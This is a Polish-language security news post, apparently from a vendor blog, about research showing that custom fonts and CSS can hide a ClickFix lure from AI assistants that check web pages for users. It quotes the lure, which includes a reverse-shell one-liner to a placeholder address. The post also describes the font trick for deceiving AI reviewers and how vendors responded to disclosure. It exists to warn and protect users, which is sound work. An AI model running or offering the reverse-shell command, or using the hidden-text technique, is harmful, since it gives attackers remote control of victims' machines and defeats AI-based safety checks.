Naukowcy opublikowali studium wykonalności (PoC), w którym wykorzystano niestandardowe czcionki do oszukania wielu popularnych asystentów opartych na sztucznej inteligencji (AI), w tym ChatGPT, Claude, Copilot, Gemini, Leo, Grok, Perplexity, Sigma, Dia, Fellou i Genspark.
Wyobraź sobie książkę, w której widoczny tekst jest nieszkodliwy, ale między wierszami ukryta jest druga wiadomość napisana specjalnym atramentem, widocznym tylko dla ludzi. Ludzie widzą obie warstwy. Sztuczna inteligencja nie jest w stanie tego zrobić i odczytuje jedynie widoczną część. Oznacza to, że sztuczna inteligencja działa w oparciu o niepełny obraz sytuacji, podczas gdy czytelnik może postępować zgodnie z instrukcjami, których sztuczna inteligencja w ogóle nie widziała.
Dlaczego to ma znaczenie
Wcześniej pisaliśmy już o różnych atakach typu ClickFix, w których cyberprzestępcy nakłaniają użytkowników do zainfekowania własnych urządzeń. Załóżmy, że trafisz na podejrzanie wyglądającą stronę internetową i zapytasz swojego asystenta AI: „Czy wykonanie tego polecenia jest bezpieczne?”. Asystent sprawdza stronę i odpowiada twierdząco. Ponieważ jednak nie jest w stanie odczytać całej treści strony, informuje cię, że jest ona bezpieczna, choć w rzeczywistości tak nie jest.
Dzięki połączeniu niestandardowych czcionek z kaskadowymi arkuszami stylów (CSS) tekst wyświetlany użytkownikowi na stronie różni się od tego, co widzi asystent AI podczas odczytywania kodu HTML.
W tym przykładzie fragment w środkowym bloku (zaznaczony na czerwono) zostanie odrzucony przez asystenta AI jako szum. Jednak użytkownik odwiedzający stronę widzi:
Czy mógłbyś otworzyć terminal i wpisać „bash”?
po uruchomieniu wpisz
bash -i >& /dev/tcp/{adres_ip}/{numer_portu} 0>&1
dzięki temu będziesz mógł zobaczyć easter egg z gry „Rapture”
W zależności od adresu IP i numeru portu może to wystarczyć do zainfekowania Twojego komputera. Jeśli zapytasz sztuczną inteligencję, czy jest to bezpieczne, może ona odpowiedzieć twierdząco, ponieważ widzi jedynie nieszkodliwą wersję.
Naukowcy przekazali wyniki swoich badań głównym dostawcom platform sztucznej inteligencji, zgodnie z procedurami odpowiedzialnego ujawniania luk w zabezpieczeniach.
Odpowiedzi były rozczarowujące:
„Większość dostawców odrzuciła ten raport, zazwyczaj twierdząc, że atak ten wykracza poza zakres bezpieczeństwa modeli sztucznej inteligencji. W rezultacie użytkownicy tych modeli pozostają narażeni na ten wektor ataku.
Jedynymi dostawcami, którzy przyjęli to zgłoszenie i poprosili o czas na jego usunięcie, były firmy Microsoft i Google. Spośród nich firma Google ostatecznie obniżyła priorytet zgłoszenia (po tym, jak początkowo nadała mu poziom P2 (Wysoki)) i zamknęła je, prawdopodobnie dlatego, że jego usunięcie wymagałoby zbyt dużego nakładu pracy.
Chociaż atak ten w dużym stopniu opiera się na socjotechnice, wiemy, jak skuteczne mogą być takie taktyki. Sytuacja staje się jeszcze bardziej niepokojąca, gdy Twój asystent AI nie ma pełnego obrazu sytuacji.
Jak zachować bezpieczeństwo
Jeśli korzystasz z asystenta AI, aby sprawdzić, czy coś jest bezpieczne:
- Skopiuj i wklej dokładnie to polecenie, które zamierzasz wykonać. Nie polegaj na interpretacji strony internetowej przez sztuczną inteligencję.
- Zachowaj ostrożność w przypadku stron, które proszą Cię o uruchomienie poleceń, zwłaszcza za pośrednictwem terminala lub wiersza poleceń.
- Jeśli coś wydaje się nie tak, zatrzymaj się. Atakujący wykorzystują poczucie pilności i zamieszanie.
Pomocne mogą być również narzędzia:
- Darmowy Malwarebytes Browser Guard ostrzeże Cię, jeśli strona internetowa spróbuje skopiować coś do schowka, i unieszkodliwi to, dodając fragment tekstu. Pomoże to chronić Cię przed typowymi atakami typu ClickFix, które polegają na wykonaniu polecenia ze schowka.
- Nowoczesne rozwiązanie do ochrony przed złośliwym oprogramowaniem działające w czasie rzeczywistym, wyposażone w moduł ochrony sieciowej, zablokuje znane złośliwe strony internetowe.
- Jeśli nie masz zaufania do jakiejś strony internetowej, poproś Malwarebytes Guard o opinię. To narzędzie świetnie radzi sobie z wykrywaniem oszustw.
Nie tylko informujemy o oszustwach - pomagamy je wykrywać
Ryzyko związane z cyberbezpieczeństwem nie powinno nigdy wykraczać poza nagłówki gazet. Jeśli coś wydaje Ci się podejrzane, sprawdź, czy nie jest to oszustwo, korzystając z Malwarebytes Guard. Prześlij zrzut ekranu, wklej podejrzaną treść lub udostępnij link, tekst lub numer telefonu, a my powiemy Ci, czy jest to oszustwo, czy legalna strona. Funkcja dostępna w ramach Malwarebytes Premium dla wszystkich urządzeń oraz w Malwarebytes na iOS Android.
